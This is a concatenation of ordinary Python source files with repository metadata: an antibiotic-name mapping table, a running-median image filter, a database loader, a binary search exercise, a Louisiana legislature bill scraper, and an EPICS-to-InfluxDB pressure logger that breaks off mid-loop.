'Ampicillin': 'Ampicillin',
'AM-Ampicillin': 'Ampicillin',
'P-Benzylpenicillin': 'Benzylpenicillin',
'Benzylpenicillin': 'Benzylpenicillin',
'Benzylpenicillin andere': 'Benzylpenicillin_others',
'Benzylpenicillin bei Meningitis': 'Benzylpenicillin_with_meningitis',
'Benzylpenicillin bei Pneumonie': 'Benzylpenicillin_with_pneumonia',
'Amphotericin.B': 'Amphotericin B',
'Amphothericin B': 'Amphotericin B',
'Ampicillin...Amoxicillin': 'Ampicillin-Amoxicillin',
'SAM-Ampicillin/Sulbactam': 'Ampicillin-Sulbactam',
'Ampicillin...Sulbactam': 'Ampicillin-Sulbactam',
'Anidulafungin': 'Anidulafungin',
'Azithromycin': 'Azithromycin',
'ATM-Aztreonam': 'Aztreonam',
'Aztreonam': 'Aztreonam',
'Bacitracin': 'Bacitracin',
'Caspofungin': 'Caspofungin',
'Cefalotin/Cefazolin': 'Cefalotin-Cefazolin',
'Cefamandol': 'Cefamandole',
'Cefazolin': 'Cefazolin',
'FEP-Cefepim': 'Cefepime',
'Cefepim': 'Cefepime',
'Cefepime': 'Cefepime',
'Cefepim.1': 'Cefepime',
'Cefixim': 'Cefixime',
'Cefoperazon-Sulbactam': 'Cefoperazon-Sulbactam',
'Cefoperazon-Sulbacta': 'Cefoperazon-Sulbactam',
'CTX-Cefotaxim': 'Cefotaxime',
'Cefotaxim': 'Cefotaxime',
'Cefoxitin Screening Staph': 'Cefoxitin_screen',
'Cefoxitin.Screen': 'Cefoxitin_screen',
'OXSF-Cefoxitin-Screen': 'Cefoxitin_screen',
'FOX-Cefoxitin': 'Cefoxitin',
'Cefoxitin': 'Cefoxitin',
'CPD-Cefpodoxim': 'Cefpodoxime',
'Cefpodoxim': 'Cefpodoxime',
'Ceftarolin': 'Ceftarolin',
'CAZ-Ceftazidim': 'Ceftazidime',
'Ceftazidim.1': 'Ceftazidime',
'Ceftazidim': 'Ceftazidime',
'Ceftazidim.Avibactam': 'Ceftazidime-Avibactam',
'Ceftazidim-Avibactam': 'Ceftazidime-Avibactam',
'Ceftibuten': 'Ceftibuten',
'Ceftobiprol': 'Ceftobiprole',
'Ceftolozan...Tazobactam': 'Ceftolozane-Tazobactam',
'Ceftolozan-Tazobacta': 'Ceftolozane-Tazobactam',
'Ceftriaxon': 'Ceftriaxone',
'CRO-Ceftriaxon': 'Ceftriaxone',
'CXMA-Cefuroxim-Axetil': 'Cefuroxime',
'Cefuroxim.Axetil': 'Cefuroxime',
'Cefuroxim iv': 'Cefuroxime',
'CXM-Cefuroxim': 'Cefuroxime',
'Cefuroxim': 'Cefuroxime',
'Cefuroxim oral': 'Cefuroxime',
'Chinolone': 'Quinolones',
'C-Chloramphenicol': 'Chloramphenicol',
'Chloramphenicol': 'Chloramphenicol',
'Ciprofloxacin': 'Ciprofloxacin',
'CIP-Ciprofloxacin': 'Ciprofloxacin',
'Clarithromycin': 'Clarithromycin',
'Clarithromycin 04': 'Clarithromycin_4mg-l',
'Clarithromycin 16': 'Clarithromycin_16mg-l',
'Clarithromycin 32': 'Clarithromycin_32mg-l',
'Clarithromycin 64': 'Clarithromycin_64mg-l',
'Clindamycin': 'Clindamycin',
'CM-Clindamycin': 'Clindamycin',
'Clindamycin ind.': 'Clindamycin_induced',
'ICR-Induzierbare Clindamycin Resistenz': 'Clindamycin_induced',
'Clofazimin': 'Clofazimine',
'Clofazimin 0.25 mg/l': 'Clofazimine_.25mg-l',
'Clofazimin 0.5 mg/l': 'Clofazimine_.5mg-l',
'Clofazimin 1.0 mg/l': 'Clofazimine_1mg-l',
'Clofazimin 2.0 mg/l': 'Clofazimine_2mg-l',
'Clofazimin 4.0 mg/l': 'Clofazimine_4mg-l',
'Colistin': 'Colistin',
'CS-Colistin': 'Colistin',
'Cotrimoxazol': 'Cotrimoxazole',
'Trimethoprim/Sulfamethoxazol': 'Cotrimoxazole',
'SXT-Trimethoprim/Sulfamethoxazol': 'Cotrimoxazole',
'Trimethoprim-Sulfame': 'Cotrimoxazole',
'DAP-Daptomycin': 'Daptomycin',
'Daptomycin': 'Daptomycin',
'ESBL': 'ESBL',
'Doxycyclin': 'Doxycycline',
'Dummy': 'Dummy',
'Ertapenem': 'Ertapenem',
'ETP-Ertapenem': 'Ertapenem',
'E-Erythromycin': 'Erythromycin',
'Erythromycin': 'Erythromycin',
'Ethambutol': 'Ethambutol',
'Ethambutol 02.5': 'Ethambutol_2mg-l',
'Ethambutol 05.0': 'Ethambutol_5mg-l',
'Ethambutol.5.0.mg.l': 'Ethambutol_5mg-l',
'Ethambutol 07.5': 'Ethambutol_7.5mg-l',
'Ethambutol 12.5': 'Ethambutol_12.5mg-l',
'Ethambutol 50': 'Ethambutol_50mg-l',
'Fluconazol': 'Fluconazole',
'Fosfomycin.Trometamol': 'Fosfomycin-Trometamol',
'FOS-Fosfomycin': 'Fosfomycin',
'Fosfomycin': 'Fosfomycin',
'FA-Fusidins\xc3\xa4ure': 'Fusidic acid',
'Fusidinsaeure': 'Fusidic acid',
'Fusidins\xc3\xa4ure': 'Fusidic acid',
'Fusidinsäure': 'Fusidic acid',
'GHLR-High-Level-Resistenz gegen Gentamicin': 'Gentamicin_high_level',
'Gentamicin High Level': 'Gentamicin_high_level',
'Gentamicin.High.level': 'Gentamicin_high_level',
'HLG-Gentamicin, High-Level (Synergie)': 'Gentamicin_high_level',
'HLS-Streptomycin, High-Level (Synergie)': 'Streptomycin_high_level',
'Gentamicin': 'Gentamicin',
'GM-Gentamicin': 'Gentamicin',
'Imipenem': 'Imipenem',
'IPM-Imipenem': 'Imipenem',
'Isavuconazol': 'Isavuconazole',
'Isoniazid': 'Isoniazid',
'Isoniazid.0.1.mg.l': 'Isoniazid_.1mg-l',
'Isoniazid 0\t1 mg/l': 'Isoniazid_.1mg-l',
'Isoniazid.0.4.mg.l': 'Isoniazid_.4mg-l',
'Isoniazid 0\t4 mg/l': 'Isoniazid_.4mg-l',
'Isoniazid 1.0 mg/l': 'Isoniazid_1mg-l',
'Isoniazid 10 mg/l': 'Isoniazid_10mg-l',
'Isoniazid 3.0 mg/l': 'Isoniazid_3mg-l',
'Itraconazol': 'Itraconazole',
'Ketoconazol': 'Ketoconazole',
'LEV-Levofloxacin': 'Levofloxacin',
'Levofloxacin': 'Levofloxacin',
'LNZ-Linezolid': 'Linezolid',
'Linezolid': 'Linezolid',
'Linezolid 01 mg/l': 'Linezolid_1mg-l',
'Linezolid 04 mg/l': 'Linezolid_4mg-l',
'Linezolid 16 mg/l': 'Linezolid_16mg-l',
'MRSA': 'MRSA',
'Meropenem.bei.Meningitis': 'Meropenem_with_meningitis',
'Meropenem.bei.Pneumonie': 'Meropenem_with_pneumonia',
'Meropenem.ohne.Meningitis': 'Meropenem_without_meningitis',
'Meropenem': 'Meropenem',
'MEM-Meropenem': 'Meropenem',
'Meropenem-Vaborbactam': 'Meropenem-Vaborbactam',
'Meropenem-Vaborbacta': 'Meropenem-Vaborbactam',
'Metronidazol': 'Metronidazole',
'Miconazol': 'Miconazole',
'Micafungin': 'Micafungin',
'Minocyclin': 'Minocycline',
'MXF-Moxifloxacin': 'Moxifloxacin',
'Moxifloxacin': 'Moxifloxacin',
'Moxifloxacin 0.5': 'Moxifloxacin_.5mg-l',
'Moxifloxacin 02.5': 'Moxifloxacin_2.5mg-l',
'Moxifloxacin 10': 'Moxifloxacin_10mg-l',
'MUP-Mupirocin': 'Mupirocin',
'Mupirocin': 'Mupirocin',
'Nalidixinsaeure': 'Nalidixin acid',
'Nitrofurantoin': 'Nitrofurantoin',
'FT-Nitrofurantoin': 'Nitrofurantoin',
'Norfloxacin': 'Norfloxacin',
'NOR-Norfloxacin': 'Norfloxacin',
'Novobiocin': 'Novobiocin',
'Ofloxacin': 'Ofloxacin',
'OFL-Ofloxacin': 'Ofloxacin',
'Oxacillin': 'Oxacillin',
'Oxa/Flucloxacil.': 'Oxacillin',
'OX1-Oxacillin': 'Oxacillin',
'Pefloxacin': 'Pefloxacin',
'Penicillin.bei.anderen.Infekten': 'Penicillin_with_other_infections',
'Penicillin.bei.Endokarditis': 'Penicillin_with_endokarditis',
'Penicillin.bei.Meningitis': 'Penicillin_with_meningitis',
'Penicillin.bei.Pneumonie': 'Penicillin_with_pneumonia',
'Penicillin.ohne.Endokarditis': 'Penicillin_without_endokarditis',
'Penicillin.ohne.Meningitis': 'Penicillin_without_meningitis',
'Penicillin': 'Penicillin',
'PIP-Piperacillin]': 'Piperacillin',
'Piperacillin/Tazobactam': 'Piperacillin-Tazobactam',
'TZP-Piperacillin/Tazobactam': 'Piperacillin-Tazobactam',
'Piperacillin...Tazobactam': 'Piperacillin-Tazobactam',
'Piperacillin-Tazobac': 'Piperacillin-Tazobactam',
'PT-Pristinamycin': 'Pristinamycine',
'Polymyxin.B': 'Polymyxin B',
'Polymyxin B': 'Polymyxin B',
'Posaconazol': 'Posaconazole',
'Pyrazinamid.100.0.mg.l': 'Pyrazinamide',
'Pyrazinamid 100\t0 mg': 'Pyrazinamide',
'Pyrazinamid': 'Pyrazinamide',
'QDA-Quinupristin/Dalfopristin': 'Quinupristin-Dalfopristin',
'Quinupristin-Dalfopr': 'Quinupristin-Dalfopristin',
'Rifabutin 0.1 mg/l': 'Rifabutin_.1mg-l',
'Rifabutin 0.4 mg/l': 'Rifabutin_.4mg-l',
'Rifabutin 2 mg/l': 'Rifabutin_2mg-l',
'Rifampicin 01.0 mg/l': 'Rifampicin_1mg-l',
'Rifampicin.1.0.mg.l': 'Rifampicin_1mg-l',
'RA-Rifampicin': 'Rifampicin',
'Rifampicin': 'Rifampicin',
'Rifampicin 02.0 mg/l': 'Rifampicin_2mg-l',
'Rifampicin 04 mg/l': 'Rifampicin_4mg-l',
'Rifampicin 20 mg/l': 'Rifampicin_20mg-l',
'SPX-Sparfloxacin': 'Sparfloxacin',
'Roxithromycin': 'Roxithromycin',
'Spectinomycin': 'Spectinomycin',
'Streptomycin.1.0.mg.l': 'Streptomycin',
'Streptomycin': 'Streptomycin',
'Strepomycin High Level': 'Strepomycin_high_level',
'Streptomycin.High.level': 'Strepomycin_high_level',
'Teicoplanin.GRD': 'Teicoplanin_GRD',
'Teicoplanin': 'Teicoplanin',
'TEC-Teicoplanin': 'Teicoplanin',
'Tetracyclin': 'Tetracycline',
'TE-Tetracyclin': 'Tetracycline',
'TIC-Ticarcillin': 'Ticarcillin',
'TCC-Ticarcillin/Clavulans\xc3\xa4ure': 'Ticarcillin-Clavulan acid',
'Ticarcillin...Clavulansaeure': 'Ticarcillin-Clavulan acid',
'TEL-Telithromycin': 'Telithromycin',
'Tigecyclin': 'Tigecycline',
'TGC-Tigecycline': 'Tigecycline',
'Tobramycin': 'Tobramycin',
'TM-Tobramycin': 'Tobramycin',
'Vancomycin.GRD': 'Vancomycin_GRD',
'Vancomycin': 'Vancomycin',
'VA-Vancomycin': 'Vancomycin',
'Voriconazol': 'Voriconazole',
'X5.Fluorocytosin': '5-Fluorocytosine',
'5-Fluorocytosin': '5-Fluorocytosine',
}
'''
| irmlerjo/maldi-prediction | const.py | const.py | py | 17,266 | python | en | code | 0 | github-code | 90 |
1301149986 | import numpy as np
class vmedian(object):
    """Running median filter for a video stream.

    Frames are kept in a 3-deep ring buffer. An ``order`` > 0 chains child
    vmedian instances, so each level summarises the median of its child's
    3-frame cycles; the effective window is 3**(order + 1) frames.
    """
    def __init__(self, order=0, dimensions=None):
        """Compute running median of a video stream
        :param order: depth of median filter: 3^(order + 1) images
        :param dimensions: (width, height) of images
        :returns:
        :rtype:
        """
        self.child = None
        self.dimensions = dimensions
        # The order setter below builds (or tears down) the child chain.
        self.order = order
        self.initialized = False
        self.index = 0
    def filter(self, data):
        # Convenience wrapper: ingest one frame, return the current median.
        self.add(data)
        return self.get()
    def get(self):
        """Return current median image
        :returns: median image
        :rtype: numpy.ndarray
        """
        return np.median(self.buffer, axis=0)
    def add(self, data):
        """include a new image in the median calculation
        :param data: image data
        :returns:
        :rtype:
        """
        if isinstance(self.child, vmedian):
            # Feed the child; only when the child's index wraps back to 0
            # has it completed a fresh 3-frame cycle worth summarising here.
            self.child.add(data)
            if (self.child.index == 0):
                self.buffer[self.index, :, :] = self.child.get()
                self.index = self.index + 1
        else:
            self.buffer[self.index, :, :] = data
            self.index = self.index + 1
        if self.index == 3:
            # Ring buffer full: wrap around and mark the median as valid.
            self.index = 0
            self.initialized = True
    @property
    def dimensions(self):
        # (width, height) of the buffered frames, or None if unset.
        return self._dimensions
    @dimensions.setter
    def dimensions(self, dimensions):
        if dimensions is not None:
            # Allocate a fresh 3-frame uint8 buffer; previous history is lost.
            self.buffer = np.zeros((3, dimensions[0], dimensions[1]),
                                   dtype=np.uint8)
            self.index = 0
        self._dimensions = dimensions
        self.initialized = False
        if isinstance(self.child, vmedian):
            # Keep the whole child chain at the same frame size.
            self.child.dimensions = dimensions
    @property
    def order(self):
        # Depth of the filter chain (clamped to [0, 10] by the setter).
        return self._order
    @order.setter
    def order(self, order):
        self._order = np.clip(order, 0, 10)
        if (self._order == 0):
            self.child = None
        else:
            # Reuse the existing child chain when possible; otherwise build one.
            if isinstance(self.child, vmedian):
                self.child.order = self._order - 1
            else:
                self.child = vmedian(order=self._order - 1,
                                     dimensions=self.dimensions)
        self.initialized = False
20752854713 | ## INFO ##
## INFO ##
# Import python modules
from json import load
from math import radians
# Import pop modules
from db.models import Artist
from db.database import initialise, session
#------------------------------------------------------------------------------#
def populate(path):
    """Initialise the database schema and load artists from the JSON file
    at *path*.

    Each artist dict is normalised in place before insertion: the 'M'/'F'
    gender code becomes 'male'/'female', and longitude/latitude strings are
    converted to radians. All rows are committed in a single transaction.
    """
    # Initialise database
    initialise()
    # Build database from JSON; the file only needs to stay open for load(),
    # so the insert loop runs after it is closed.
    with open(path) as file:
        artists = load(file)
    # The original used enumerate() here but never used the index; dropped.
    for artist in artists['artists']:
        artist.update(gender='male' if artist['gender'] == 'M' else 'female')
        artist.update(longitude=radians(float(artist['longitude'])))
        artist.update(latitude=radians(float(artist['latitude'])))
        session.add(Artist(**artist))
    session.commit()
| petervaro/pop | db/populate.py | populate.py | py | 776 | python | en | code | 0 | github-code | 90 |
def binary_search(arr, value):
    """Return True if *value* is present in the ascending-sorted list *arr*.

    Classic iterative binary search: O(log n) time, O(1) space. An empty
    list returns False.
    """
    low = 0
    high = len(arr) - 1
    # The original also guarded `low >= 0 and high <= len(arr)-1`; those
    # conditions are redundant because low and high always stay inside
    # [0, len(arr)-1] while low <= high holds.
    while low <= high:
        mid = (low + high) // 2
        if arr[mid] == value:
            return True
        elif value > arr[mid]:
            low = mid + 1
        else:
            high = mid - 1
    return False
# Exercise binary_search on a few sample lists. NOTE(review): the fourth
# case deliberately keeps the original's unsorted input, so its answer
# reflects binary search's behaviour on unsorted data.
inputs = [[1, 2, 3, 4, 5], [1, 2, 4, 5], [1, 2, 4, 5], [-1, 1, 2, 9, 5, 7], []]
to_find = [3, 3, 6, -1, 13]
for arr, wanted in zip(inputs, to_find):
    print("Is the element ", wanted, " in the list ", arr, ": ", binary_search(arr, wanted))

#Time Complexity - O(log n) where n is the size of the input arr
#Space Complexity - 0(1)
18814491827 | import datetime as dt
import lxml.html
import tempfile
import os
import re
from collections import defaultdict
from openstates.scrape import Scraper, Bill, VoteEvent
from openstates.utils import convert_pdf
from openstates.exceptions import EmptyScrape
from utils import LXMLMixin
# from . import actions
from .actions import Categorizer
class LABillScraper(Scraper, LXMLMixin):
categorizer = Categorizer()
_chambers = {"S": "upper", "H": "lower", "J": "legislature"}
_bill_types = {
"B": "bill",
"R": "resolution",
"CR": "concurrent resolution",
"SR": "study request",
"CSR": "concurrent study request",
}
_session_ids = {
"2017 1st Extraordinary Session": "171ES",
"2017 2nd Extraordinary Session": "172ES",
"2017": "17RS",
"2018 1st Extraordinary Session": "181ES",
"2018": "18RS",
"2018 2nd Extraordinary Session": "182ES",
"2018 3rd Extraordinary Session": "183ES",
"2019": "19RS",
"2020": "20RS",
"2020s1": "201ES",
"2020s2": "202ES",
"2021": "21RS",
"2022": "22RS",
"2022s1": "221ES",
"2022s2": "222ES",
"2023": "23RS",
"2023s1": "231ES",
}
    def pdf_to_lxml(self, filename, type="html"):
        """Convert the PDF at *filename* to text (via convert_pdf) and parse
        the result into an lxml HTML tree.

        NOTE(review): the *type* parameter shadows the builtin; the name is
        kept for interface compatibility.
        """
        text = convert_pdf(filename, type)
        return lxml.html.fromstring(text)
def _get_bill_abbreviations(self, session_id):
page = self.lxmlize(
"https://www.legis.la.gov/legis/BillSearch.aspx?"
"sid={}".format(session_id)
)
if page.xpath("//span[contains(@id,'PageContent_labelNoBills')]"):
raise EmptyScrape
return
select_options = page.xpath('//select[contains(@id, "InstTypes")]/option')
bill_abbreviations = {"upper": [], "lower": []}
for option in select_options:
type_text = option.text
if type_text.startswith("S"):
bill_abbreviations["upper"].append(type_text)
elif type_text.startswith("H"):
bill_abbreviations["lower"].append(type_text)
return bill_abbreviations
    def do_post_back(self, page, event_target, event_argument):
        """Simulate an ASP.NET __doPostBack() on *page* and return the
        resulting page as an lxml tree with absolute links.

        Every <input> of the page's aspnetForm is collected as form data
        (presumably including ASP.NET view-state fields), the
        __EVENTTARGET/__EVENTARGUMENT fields are set, and the form is
        submitted using the method it declares.
        """
        form = page.xpath("//form[@id='aspnetForm']")[0]
        block = {
            name: value
            for name, value in [(obj.name, obj.value) for obj in form.xpath(".//input")]
        }
        block["__EVENTTARGET"] = event_target
        block["__EVENTARGUMENT"] = event_argument
        if form.method == "GET":
            ret = lxml.html.fromstring(self.get(form.action, data=block).text)
        elif form.method == "POST":
            ret = lxml.html.fromstring(self.post(form.action, data=block).text)
        else:
            raise AssertionError(
                "Unrecognized request type found: {}".format(form.method)
            )
        ret.make_links_absolute(form.action)
        return ret
    def bill_pages(self, url):
        """Yield each page of a paginated bill search result.

        The first page is fetched directly; subsequent pages are requested
        by replaying the ' > ' (next) link's postback until that link is
        missing or disabled.
        """
        response = self.get(url, allow_redirects=False)
        page = lxml.html.fromstring(response.text)
        page.make_links_absolute(url)
        yield page
        while True:
            hrefs = page.xpath("//a[text()=' > ']")
            if hrefs == [] or "disabled" in hrefs[0].attrib:
                return
            href = hrefs[0].attrib["href"]
            # The href appears to be a __doPostBack('<token>', ...) call;
            # extract the event-target token between the quotes.
            tokens = re.match(r".*\(\'(?P<token>.*)\',\'.*", href).groupdict()
            page = self.do_post_back(page, tokens["token"], "")
            if page is not None:
                yield page
def scrape_bare_page(self, url):
try:
page = self.lxmlize(url)
return page.xpath("//a")
except lxml.etree.ParserError:
return []
    def scrape(self, chamber=None, session=None):
        """Yield Bill (and nested VoteEvent) objects for *session*.

        For each requested chamber, every bill-type abbreviation is walked
        through the paginated BillSearchListQ results; each bill detail link
        is delegated to scrape_bill_page. Duplicate bill URLs are skipped.
        """
        chambers = [chamber] if chamber else ["upper", "lower"]
        session_id = self._session_ids[session]
        # Scan bill abbreviation list if necessary.
        self._bill_abbreviations = self._get_bill_abbreviations(session_id)
        # there are duplicates we need to skip
        seen_bill_urls = set()
        for chamber in chambers:
            for bill_abbreviation in self._bill_abbreviations[chamber]:
                bill_list_url = "https://www.legis.la.gov/Legis/BillSearchListQ.aspx?s={}&r={}1*".format(
                    session_id, bill_abbreviation
                )
                bills_found = False
                for bill_page in self.bill_pages(bill_list_url):
                    for bill in bill_page.xpath(
                        "//a[contains(@href, 'BillInfo.aspx') and text()='more...']"
                    ):
                        bill_url = bill.attrib["href"]
                        if bill_url in seen_bill_urls:
                            continue
                        seen_bill_urls.add(bill_url)
                        bills_found = True
                        yield from self.scrape_bill_page(
                            chamber, session, bill_url, bill_abbreviation
                        )
                if not bills_found:
                    # If a session only has one legislative item of a given type
                    # (eg, some special sessions only have one `HB`), the bill list
                    # will redirect to its single bill's page
                    yield from self.scrape_bill_page(
                        chamber, session, bill_list_url, bill_abbreviation
                    )
def get_one_xpath(self, page, xpath):
ret = page.xpath(xpath)
if len(ret) != 1:
raise Exception
return ret[0]
    def scrape_votes(self, bill, url):
        """Yield VoteEvents parsed from every vote-document link on *url*."""
        text = self.get(url).text
        page = lxml.html.fromstring(text)
        page.make_links_absolute(url)
        for a in page.xpath("//a[contains(@href, 'ViewDocument.aspx')]"):
            # The link text carries the chamber and motion; scrape_vote
            # parses it and skips texts it does not recognise.
            yield from self.scrape_vote(bill, a.text, a.attrib["href"])
    def scrape_vote(self, bill, name, url):
        """Parse one vote-tally PDF into a VoteEvent and yield it.

        *name* must look like "<Senate|House> Vote on <doc>,<motion>";
        anything else is silently skipped. The PDF at *url* is downloaded to
        a temp file, converted to text, and its YEAS/NAYS/ABSENT roll-call
        sections are tallied into yes/no/other votes.
        """
        match = re.match("^(Senate|House) Vote on [^,]*,(.*)$", name)
        if not match:
            return
        chamber = {"Senate": "upper", "House": "lower"}[match.group(1)]
        motion = match.group(2).strip()
        # Classify the motion; unknown motions get an empty classification.
        # NOTE(review): `type` shadows the builtin; kept as-is.
        if motion.startswith("FINAL PASSAGE"):
            type = "passage"
        elif motion.startswith("AMENDMENT"):
            type = "amendment"
        elif "ON 3RD READING" in motion:
            type = "reading-3"
        else:
            type = []
        # Download the PDF to a temp file, parse it, then clean up.
        (fd, temp_path) = tempfile.mkstemp()
        self.urlretrieve(url, temp_path)
        html = self.pdf_to_lxml(temp_path)
        os.close(fd)
        os.remove(temp_path)
        vote_type = None
        body = html.xpath("string(/html/body)")
        date_match = re.search(r"Date: (\d{1,2}/\d{1,2}/\d{4})", body)
        try:
            date = date_match.group(1)
        except AttributeError:
            # No "Date: mm/dd/yyyy" line found; skip this document.
            self.warning("BAD VOTE: date error")
            return
        start_date = dt.datetime.strptime(date, "%m/%d/%Y")
        # d maps "yes"/"no"/"other" to the voter-name lines under each header.
        d = defaultdict(list)
        for line in body.replace("\xa0", "\n").split("\n"):
            line = line.replace(" ", "").strip()
            # Skip blank lines and "Total --"
            if not line or "Total --" in line:
                continue
            if line in ("YEAS", "NAYS", "ABSENT"):
                # Section header: subsequent lines are voters of this type.
                vote_type = {"YEAS": "yes", "NAYS": "no", "ABSENT": "other"}[line]
            elif line in ("Total", "--"):
                vote_type = None
            elif vote_type:
                if vote_type == "yes":
                    d["yes"].append(line)
                elif vote_type == "no":
                    d["no"].append(line)
                elif vote_type == "other":
                    d["other"].append(line)
        yes_count = len(d["yes"])
        no_count = len(d["no"])
        other_count = len(d["other"])
        # The PDFs oddly don't say whether a vote passed or failed.
        # Hopefully passage just requires yes_votes > not_yes_votes
        if yes_count > (no_count + other_count):
            passed = True
        else:
            passed = False
        vote = VoteEvent(
            chamber=chamber,
            start_date=start_date.strftime("%Y-%m-%d"),
            motion_text=motion,
            result="pass" if passed else "fail",
            classification=type,
            bill=bill,
        )
        vote.set_count("yes", yes_count)
        vote.set_count("no", no_count)
        vote.set_count("other", other_count)
        for key, values in d.items():
            for item in values:
                vote.vote(key, item)
        vote.add_source(url)
        yield vote
def scrape_bill_page(self, chamber, session, bill_url, bill_abbreviation):
    """Scrape one Louisiana bill page: sponsors, documents, versions, votes, actions.

    Yields any VoteEvent objects produced by ``scrape_votes`` followed by the
    Bill object itself.
    """
    page = self.lxmlize(bill_url)
    author = self.get_one_xpath(page, "//a[@id='ctl00_PageBody_LinkAuthor']/text()")

    def sbp(x):
        # Follow the in-page link whose text contains `x` and scrape that page.
        return self.scrape_bare_page(
            page.xpath("//a[contains(text(), '%s')]" % (x))[0].attrib["href"]
        )

    authors = [x.text for x in sbp("Authors")]
    # Each of these sections may be missing on a given bill page; the xpath
    # indexing inside sbp() raises IndexError when the link is absent.
    try:
        digests = sbp("Digests")
    except IndexError:
        digests = []
    try:
        versions = sbp("Text")
    except IndexError:
        versions = []
    try:
        amendments = sbp("Amendments")
    except IndexError:
        amendments = []

    title = page.xpath("//span[@id='ctl00_PageBody_LabelShortTitle']/text()")[0]
    # Collapse the double non-breaking space the site uses as a separator.
    title = title.replace("\u00a0\u00a0", " ")
    these_actions = page.xpath(
        "//div[@id='ctl00_PageBody_PanelBillInfo']/"
        "/table[@style='font-size:small']/tr"
    )

    bill_id = page.xpath("//span[@id='ctl00_PageBody_LabelBillID']/text()")[0]
    # Strip the chamber letter from the abbreviation to look up the bill type.
    bill_type = self._bill_types[bill_abbreviation[1:]]
    bill = Bill(
        bill_id,
        legislative_session=session,
        chamber=chamber,
        title=title,
        classification=bill_type,
    )
    bill.add_source(bill_url)

    # The primary author appears in the full author list; the remainder are
    # cosponsors. Loop variable renamed so it no longer shadows `author`.
    authors.remove(author)
    bill.add_sponsorship(
        author, classification="primary", entity_type="person", primary=True
    )
    for cosponsor in authors:
        bill.add_sponsorship(
            cosponsor, classification="cosponsor", entity_type="person", primary=False
        )

    for digest in digests:
        bill.add_document_link(
            note=digest.text,
            url=digest.attrib["href"],
            media_type="application/pdf",
        )
    for version in versions:
        bill.add_version_link(
            note=version.text,
            url=version.attrib["href"],
            media_type="application/pdf",
        )
    for amendment in amendments:
        if "href" in amendment.attrib:
            bill.add_version_link(
                note=amendment.text,
                url=amendment.attrib["href"],
                media_type="application/pdf",
            )

    try:
        votes_link = page.xpath("//a[text() = 'Votes']")[0]
        yield from self.scrape_votes(bill, votes_link.attrib["href"])
    except IndexError:
        # Some bills don't have any votes
        pass

    # Hoisted out of the loop: the session start year is loop-invariant.
    session_year = self.jurisdiction.legislative_sessions[-1]["start_date"][0:4]
    for action in these_actions:
        # Renamed from (date, chamber, page, text): the original names
        # shadowed the `chamber` parameter and the lxml `page` tree.
        action_date, action_chamber, _page_no, action_text = [
            x.text for x in action.xpath(".//td")
        ]
        # Session is April -> June. Prefiles look like they're in
        # January at earliest.
        action_date += "/{}".format(session_year)
        parsed_date = dt.datetime.strptime(action_date, "%m/%d/%Y")
        attrs = self.categorizer.categorize(action_text)
        bill.add_action(
            description=action_text,
            date=parsed_date.strftime("%Y-%m-%d"),
            chamber=self._chambers[action_chamber],
            classification=attrs["classification"],
        )

    yield bill
| openstates/openstates-scrapers | scrapers/la/bills.py | bills.py | py | 12,028 | python | en | code | 820 | github-code | 90 |
71111360937 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 8 16:34:35 2018
@author: bernardo carvalho
https://pypi.org/project/influxdb/
http://influxdb-python.readthedocs.io/en/latest/api-documentation.html#influxdb.DataFrameClient.write_points
"""
# Standard library
import json
import os
import sys
import time
from datetime import datetime, timezone

# Third-party
import epics
import numpy as np
#from influxdb_client import InfluxDBClient
from influxdb import InfluxDBClient
sys.path
os.environ['EPICS_CA_ADDR_LIST'] = '192.168.1.110'
os.environ['EPICS_CA_AUTO_ADDR_LIST'] = 'NO'
client = InfluxDBClient('localhost', 8086, 'oper', 'opertok', 'epics_isttok')
client.create_database('epics_isttok')
#client = InfluxDBClient('http://127.0.0.1:8086', username='oper', password='opertok')
#def onChanges(pvname=None, value=None, char_value=None, **kw):
# pass
SCAN_PERIOD = 15
opstate_pv = epics.PV('ISTTOK:central:OPSTATE')
vv_press_pv = epics.PV('ISTTOK:central:VVessel-Pressure')
vv_press_pv.get(timeout=10)
#client.get_list_database()
def on_opstate_change(pvname=None, value=None, char_value=None, timestamp=None, **kw):
    """EPICS callback: write a point tagged with the new OPSTATE to InfluxDB.

    Arguments mirror the pyepics callback signature; `timestamp` is epoch seconds.
    """
    print('PV opstate Changed! {} {} {}'.format(pvname, char_value, timestamp))
    # Bug fix: the point time is serialized with a 'Z' (UTC) suffix, so the
    # epoch timestamp must be converted to UTC, not to implicit local time.
    dt = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    json_body = [{
        "measurement": "central",
        "tags": {"OPSTATE": opstate_pv.char_value},
        "time": dt.strftime('%Y-%m-%dT%H:%M:%SZ'),
        "fields": {"VVessel-Pressure": vv_press_pv.value}
    }]
    print(json_body)
    client.write_points(json_body)
def on_vv_press_change(pvname=None, value=None, char_value=None, timestamp=None, **kw):
    """EPICS callback: write the vacuum-vessel pressure to InfluxDB.

    Arguments mirror the pyepics callback signature; `timestamp` is epoch seconds.
    """
    print('PV Changed! {} {} {}'.format(pvname, value, timestamp))
    # Bug fix: the point time is serialized with a 'Z' (UTC) suffix, so the
    # epoch timestamp must be converted to UTC, not to implicit local time.
    # https://stackoverflow.com/questions/51014779/how-send-proper-timestamp-to-influxdb-with-influxdb-python
    dt = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    json_body = [
        {
            "measurement": "central",
            "tags": {},
            "time": dt.strftime('%Y-%m-%dT%H:%M:%SZ'),
            "fields": {
                "VVessel-Pressure": value}
        }
    ]
    print(json_body)
    # write_points(points, time_precision=None, database=None, retention_policy=None, ...)
    client.write_points(json_body)
#vv_press_pv.add_callback(on_vv_press_change)
tmp1_press_admission_pv = epics.PV('ISTTOK:central:TMPump1-PressureAdmission')
rpump1_press_pv = epics.PV('ISTTOK:central:RPump1-Pressure')
opstate_pv.add_callback(on_opstate_change)
# https://medium.com/greedygame-engineering/an-elegant-way-to-run-periodic-tasks-in-python-61b7c477b679
# Main polling loop: every SCAN_PERIOD seconds read the pressure PVs and write
# one point, tagged with the machine OPSTATE, to InfluxDB.
while True:
    pv1_m_data = rpump1_press_pv.get_with_metadata()
    pv2_m_data = tmp1_press_admission_pv.get_with_metadata()
    pv3_m_data = vv_press_pv.get_with_metadata()
    opstate_pv.get()  # refresh the cached char_value used as a tag below
    # Bug fix: the point time is serialized with a 'Z' (UTC) suffix, so the
    # epoch timestamp must be converted to UTC, not to implicit local time.
    dt = datetime.fromtimestamp(pv1_m_data['timestamp'], tz=timezone.utc)
    json_body = [{
        "measurement": "central",
        "tags": {'OPSTATE': opstate_pv.char_value},
        "time": dt.strftime('%Y-%m-%dT%H:%M:%SZ'),
